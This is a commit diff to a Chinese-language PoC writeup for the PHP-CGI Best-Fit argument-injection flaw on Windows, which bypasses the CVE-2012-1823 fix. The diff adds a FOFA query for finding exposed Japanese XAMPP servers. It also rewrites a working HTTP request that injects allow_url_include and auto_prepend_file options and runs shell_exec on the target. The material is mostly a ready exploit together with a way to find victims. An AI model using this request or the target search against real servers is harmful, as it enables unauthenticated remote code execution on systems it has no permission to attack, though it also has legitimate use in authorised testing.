修改payload
This commit is contained in:
parent
b3f07cb2f6
commit
3c95a6c50e
@ -2,13 +2,19 @@
|
|||||||
|
|
||||||
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。
|
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
|
||||||
|
```
|
||||||
|
app="XAMPP" && country="JP"
|
||||||
|
```
|
||||||
|
|
||||||
## poc
|
## poc
|
||||||
|
|
||||||
```
|
```
|
||||||
POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||||
Host:
|
Host:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
<?php echo shell_exec("dir"); ?>
|
<?php echo shell_exec("dir"); ?>
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -37,3 +43,4 @@ if __name__ == "__main__":
|
|||||||
test_cgi_vulnerability(url)
|
test_cgi_vulnerability(url)
|
||||||
```
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user